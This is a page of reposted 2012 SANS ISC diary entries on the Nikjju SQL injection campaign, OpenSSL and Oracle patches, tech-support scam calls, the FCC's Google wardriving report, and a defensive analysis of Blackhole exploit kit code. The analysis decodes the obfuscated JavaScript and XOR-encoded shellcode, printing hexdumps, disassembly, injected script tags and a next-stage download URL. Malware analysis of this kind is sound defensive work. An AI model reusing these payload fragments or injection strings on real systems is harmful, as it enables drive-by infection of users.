Počet zobrazení stránky

neděle 6. května 2012

Continued interest in Nikjju mass SQL injection campaign


Readers continue to write in conveying updates from sourcesregarding the Nikjju mass SQL injection campaign. Like the Lilupophilupop campaign from December, ASP/ASP.net sites are target and scripts inserted.
Be wary of <script src= hxxp://nikjju.com/r.php ></script> or <script src = hxxp://hgbyju.com/r.php <</script> and the resulting fake/rogue AV campaigns they subject victims to.
Infected site count estimations vary wildly but a quick search of the above strings will give you insight. Handler Mark H continues to track this one and indicates that the MO is similar to the lihupophilupop campaign but that they're trying some interesting things this round. We'll report if anything groundbreaking surfaces.
As always if you have logs to share send them our way via the contact form or any comment with any insight you want to share with readers.

OpenSSL reissues fix for ASN1 BIO vulnerability


OpenSSL has posted an updated advisory today indicating the fix for CVE-2012-2110 released on 19APR2012 was not sufficient to correct the ASN1 BIO vulnerability issue for OpenSSL version 0.9.8.
Please note that this latest issue only affects OpenSSL 0.9.8v.  OpenSSL 1.0.1a and 1.0.0i already contain a patch as released on the 19th sufficient to correct CVE-2012-2110.
Please upgrade to 0.9.8w.

Blacole's obfuscated JavaScript


Looking back on how we used to analyze malicious JavaScript five years ago, it is quite amazing to see the "evolution" of code obfuscation that the bad guys went through.
Most of the current obfuscation methods make heavy use of objects and functions that are only present in the web browser or Adobe reader. Since it is unlikely that a JavaScript analysis engine on, for example, a web proxy anti-virus solution can duplicate the entire object model of Internet Explorer, the bad guys are hoping that automated analysis will fail, and their JavaScript will make it past the virus defenses to the user's browser, where it will run just fine.
Often, this actually works. The current wave of Blackhole (Blacole) exploit kits are a good example - it took Anti-Virus a looong time to catch on to these infected web sites. Even today, the raw malicious JavaScript block full of exploit attempts comes back with only 14/41 on Virustotal
 
Here's what the Blacole obfuscated Javascript looks like:
Unlike "older" obfuscation methods, this "Blacole" encoding is almost human readable again. But automated analysis still has a tough time with it, because the code is heavy on browser objects and function prototypes:
 
None of this will run in command line JavaScript interpreters like "SpiderMonkey". Analysis environments like Cuckoo and Wepawetare doing a pretty good job at this, but often also trip up.
If all else fails, while manual analysis of the code is tedious, it usually leads to the desired result. A bit further down in the JavaScript block, we find
This looks like a loop over the code block that replaces/transposes characters based on their ASCII code. If the ASCII Code is >25 and <52, 26 gets added to it. If it is >=52 and <78, 26 gets subtracted. Otherwise, the ASCII code remains unchanged. This is like a "poor man's Caesar Cipher", swapping out one letter against another.
Something we can readily reproduce in a couple lines of Perl :)
$cat decode.pl
#!/usr/bin/perl -w
while (<>) {
  for ($i=0; $i<length($_); $i++) {
    $c=substr($_,$i,1);
    $o=ord($c);
    if (($o>25) && ($o<52)) {
      $k=$o+26;
    } elsif (($o>=52) && ($o<78)) {
      $k=$o-26;
    } else { $k=$o };
    print chr($k);
  }
}
And, lo and behold:
$cat malscript.js | ./decode.pl

The decoding is not yet complete (there are a couple more steps in this obfuscation), but the name and location of one of the EXEs is already apparent.

Thanks to ISC reader Jan for the sample.

Blacole's shell code


Let's assume you finished the analysis of Blacole's obfuscated Javascript (see my earlier diary today), and you are still left with a code block like this

and you wonder what it does. The first step in Shell Code analysis is to "clean it up", in the case at hand here, we have to remove those spurious "script" tags
because they would trip us up in any of the following steps.
Once we're left with only the actual unicode (%uxxyy...) , we can turn this into printable characters:
$ cat raw.js | perl -pe 's/%u(..)(..)/chr(hex($2)).chr(hex($1))/ge' > decoded.bin
$ cat decoded.bin | hexdump -C
00000000 41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 |AAAAf.äüüë.X1Éf.|
00000010 e9 57 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff |éWþ.0(@âúë.èëÿÿÿ|
00000020 ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 |­Ì].Áw.èL£h.£h$£|
00000030 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 |X4~£^ .óN£v.+\..|
00000040 a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 |©Æ=8××.£h.ën..]Ó|
[...]
This doesn't result in anything all that useful yet. Shellcode is in assembly language, so it wouldn't be "readable" in a hex dump anyway. But since most shellcode just downloads and runs an executable .. well, the name of the EXE could have been visible. Not in this case, because the shellcode is .. encoded one more time :).
Next step: Disassemble.
The quickest way to do so from a Unix command line (that I'm aware of) is to wrap the shell code into a small C program, compile it, and then disassemble it:
$ cat decoded.bin | perl -ne 's/(.)/printf "0x%02x,",ord($1)/ge > decoded.c
results in
0x41,0x41,0x41,0x41,0x66,0x83,0xe4,0xfc,0xfc,0xeb,0x10,0x58,0x31,0xc9 [...]
which is the correct format to turn it into
$ cat decoded.c
unsigned char shellcode[] = {
0x41,0x41,0x41,0x41,0x66,0x83,0xe4,0xfc, [...] }
int main() { }
which in turn can be compiled:
$ gcc -O0 -fno-inline decoded.c -o decoded.obj
which in turn can be disassembled:
$ objdump -M intel,i386 -D decoded.obj > decoded.asm
and we are left with a file "decoded.asm". This file will contain all the glue logic that this program needs to run on Unix .. but we're not interested in that. The only thing we're after is the disassembled contents of the array "shellcode":
0000000000600840 <shellcode>:
 600840:       41                      inc    ecx
 600841:       41                      inc    ecx
 600842:       41                      inc    ecx
 600843:       41                      inc    ecx
 600844:       66 83 e4 fc             and    sp,0xfffffffc
 600848:       fc                      cld
 600849:       eb 10                   jmp    60085b <shellcode+0x1b>
 60084b:       58                      pop    eax
 60084c:       31 c9                   xor    ecx,ecx
 60084e:       66 81 e9 57 fe          sub    cx,0xfe57
 600853:       80 30 28                xor    BYTE PTR [eax],0x28
 600856:       40                      inc    eax
 600857:       e2 fa                   loop   600853 <shellcode+0x13>
 600859:       eb 05                   jmp    600860 <shellcode+0x20>
 60085b:       e8 eb ff ff ff          call   60084b <shellcode+0xb>
 600860:       ad                      lods   eax,DWORD PTR ds:[esi]
 600861:       cc                      int3
 600862:       5d                      pop    ebp
 [...]
A-Ha! Somebody is XOR-ing something here with 0x28 (line 600853).  If we look at this in a bit more detail, we notice an "odd" combination of JMP and CALL.
Why would the code JMP to an address only to CALL back to the address that's right behind the original JMP ? Well .. The shell code has no idea where it resides in memory when it runs, and in order to XOR-decode the remainder of the shellcode, it has to determine its current address. A "CALL" is a function call, and pushes a return address onto the CPU stack. Thus, after the "call 60085b" instruction, the stack will contain 600860 as the return address. The instruction at 60084b then "pops" this address from the stack, which means that register EAX now points to 600860 .. and xor [eax], 0x28 / inc eax then cycle over the shellcode, and XOR every byte with 0x28.
Let's try the same in Perl:
$ cat decoded.bin | perl -pe 's/(.)/chr(ord($1)^0x28)/ge' > de-xored.bin
$ hexdump -C de-xored.bin | tail -5
00000190 0e 89 6f 01 bd 33 ca 8a 5b 1b c6 46 79 36 1a 2f |..o.½3Ê.[.ÆFy6./|
000001a0 70 68 74 74 70 3a 2f 2f 38 35 2e 32 35 2e 31 38 |phttp://85.25.18|
000001b0 39 2e 31 37 34 2f 71 2e 70 68 70 3f 66 3d 62 61 |9.174/q.php?f=ba|
000001c0 33 33 65 26 65 3d 31 00 00 28 25 0a             |33e&e=1..(%.    |
Et voilà, we get our next stage URL.
If you want to reproduce this analysis, you can find the original (raw.js) shellcode file on Pastebin.

Who's tracking phone calls that target your computer? Stay Tuned to the ISC


The story I am about to tell is similar to the diaries posted by Rob VandenBrink in July 2010,  Mark Hofman in May of 2011 andDaniel Wesemann in March of 2012.  This past week I got a call from someone that I thought was a regular old telemarketer until they said they were from a company in Texas providing Microsoft Support.  The caller had a very thick Indian accent.  I played along like a dumb user (the lady kept getting very angry with me when I asked her to repeat things and said I didn't understand:)  I got to look at my logs by running "eventvwr" from run line prompt. In my application logs, I found out that warning and error messages were really "viruses" and I should not click on them because they would multiply and destroy my mother board.  I also got to run "inf virus", which just opens the Window's inf folder and disregards the word "virus", and was asked if I downloaded those files.  Of course I said no and she told me they were viruses and all sorts of evil things that had been downloaded to my computer.  She then said that Microsoft had developed a very special software that would take care of all of this for me and she would help me.  She asked me to now type "www.logmein123.com" at the run line.  At this point, 40 minutes later, I told her I had to go somewhere.  I asked if I could call her back because I sure didn't want all that stuff on my computer.  She said I could and gave me the number 773-701-5437 and said her name was Peggy.  I didn't have time to finish the call, but I sure would have like to have gotten a VM fired up and see what "special software" she had for me to install.
After the call, I started researching this type of scam and was surprised to see it seemed to be dating back to the 2009 time frame.  However, I could not find any statistics that were tracking this data.  Maybe I am just looking in the wrong place.  I saw guidance from contact your local law enforcement to send an email to antiphishing.org.  I checked antiphishing.org and could not find any data on this trend nor is there any mention in their report released 26 April 2012 that summarized 2H2011.  It states "This report seeks to understand trends and their significances by quantifying the scope of the global phishing problem. Specifically, this new report examines all the phishing attacks detected in the second half of 2011 (“2H2011”, July 1, 2011 through December 31, 2011)."   This type of phishing is something APWG doesn't appear to track at this time.
I consider these calls to still be phishing attempts because according to APWG, phishing is defined as "Phishing is a criminal mechanism employing both social engineering and technical subterfuge to steal consumers’ personal identity data and financial account credentials."  The delivery vector is not email in this case but rather a phone call.  The end result is still the same.  So, where does that leave us for tracking the trend of fake calls whose target is your computer?
At this point in time, there is no central tracking of this type of delivery vector.  However, stay tuned to the ISC.  After discussing this with some of the other handlers, the ISC is going to set up a method for reporting these attempts to us for tracking and trending this delivery method.  More will be posted in the near future as soon as the details are worked out.

UPDATE:  The page for reporting these types of calls is now available at isc.sans.edu/reportfakecall.html.  Please let us know what you think and if we have missed anything.

Workaround for Oracle TNS Listener issue released !


Just a quick update to Johannes's story on the 27th about the Oracle TNS listener vulnerability ( http://isc.sans.edu/diary.html?storyid=13069 )

We received two updates from our readers on this today:
Reader "anothergeek" posted a comment to Johannes's story, noting that Oracle released a workaround today (Apr 30) - find details here ==>http://www.oracle.com/technetwork/topics/security/alert-cve-2012-1675-1608180.html

Shortly after, reader R.P. pointed us to a page that had proof of concept ( with a video no less) ==> http://eromang.zataz.com/2012/04/30/oracle-database-tns-poison-0day-video-demonstration/


So get that maintenance window scheduled folks!  Those patches don't do you any good in your Downloads folder!

From the perspective of someone who does audits and assessments, it's a sad thing to note that in many organizations it's tough to schedule maintenance on a large Oracle server.  So many applications get piled on these that database and operating system patches can be a real challenge to book, because an interruption in service can affect dozens or hundreds of applications.

Sadly this means that database patches are often quarterly or annual events.  Or "fairy tale events" (as in never-never).

FCC posts Enquiry Documents on Google Wardriving


Remember back in 2010, Google was in hot water for some wardriving activities, where personal information was gathered from unencrypted  wireless networks found during it's Streetview activities?  Deb wrote this up here ==> https://isc.sans.edu/diary.html?storyid=8794

Well, it looks like the discussion won't die - the FCC has just posted a summary of its findings here, along with some good background and a chronology of events in their investigation ==> http://transition.fcc.gov/DA-12-592A1.pdf

You'll notice that it's heavily redacted.  A version with much less redacting can be found here ==>http://www.scribd.com/fullscreen/91652398

It's very interesting reading.  What I found most interesting in the paper was:
  • I thought it was sensible that the engineer didn't go write a new tool for this - they used Kismet to collect the data, then massaged Kismet’s output during their later analysis. Aside from the fact that anyone who's been in almost any SANS class would realize how wrong using the tool was, at least they didn't go write something from scratch.
  •  Page 2 outlines the various radio licenses held by Google.  This caught my eye mostly because I'm in the process of studying up for my own license. 
  • The suggestion and implementation for the data collection in the controversy came from unnamed engineers ("Engineer Doe" in the paper).  I found it really interesting how the final "findings" document doesn't name actual names - I'd have thought that assigning responsibility would be one of the main purposes of this doc, but hey, what do I know?
  • Engineer Doe actually outlined in a design document how the tool would collect payloads (page 10/11), but then discounted the impact because the Streetview cars wouldn't "be in close proximity to any given user for an extended period of time".  The approval for the activity came from a manager who (as far as this doc is concerned) didn't understand the implications of collecting this info, or maybe didn't read the doc, or missed the importance of that section  - though a rather pointed question about where URL information was coming from was lifted out of one critical email.
Needless to say, violating Privacy Legislation "just a little bit" is like being a little bit pregnant - the final data included userids, passwords, health information, you name it.  As they say "close only counts in horseshoes and hand grenades" - NOT in Compliance to Privacy rules !

Long story short, this document outlines how the manager(s) of the project trusted the engineers word on the legal implications of their activity.  I see this frequently in my "day job".  Managers often don't know when to seek a legal opinion - in a lot of cases, if it sounds technical, it must be a technical decision right?  So they ask their technical people.  Or if they know that they need a legal opinion, they frequently don't have a budget to go down this road, so are left on their own to take their best shot at the "do the right thing" decision.  As you can imagine, if the results of a decision like this ever comes back to see the light of day, it seldom ends well.   Though in Google's case, they have a legal department on staff, and I'd imagine that one of their primary directives is to keep an eye on Privacy Legislation, Regulations and Compliance to said legislation.  Though you can't fault the legal team if the question never gets directed their way  (back to middle managment).

From a project manager point of view, this nicely outlines how expanding the scope of a project without the approval of the project sponsor is almost always a bad idea.  in most cases I’ve seen, the implications of changing the scope are all around impacts to budget and schedule, but in this case, a good idea and a neat project (Google Streetview) ended up being associated with activity that ended up being deemed illegal, which is a real shame.  From a project manager's perspective, exceeding the project scope is almost as bad a failure as not meeting the scope.   Exceeding the scope means that either you exceeded the budget or schedule, mis-estimated the budget or schedule, or in this case didn't get the legal homework done on the scope overage.

Take a minute to read the FCC doc (either version).  It's an interesting chronology of a technical project's development and execution, mixed in with company politics, legal investigation and a liberal sprinkling of "I don't recall the details of that event" type statements.  Not the stuff that blockbuster movies are made of, but interesting nonetheless !

We invite your opinions, or any corrections if I've mis-interpreted any of this - please use our COMMENT FORM.  I've hit the high points, but I'm no more an lawyer than "Engineer Doe"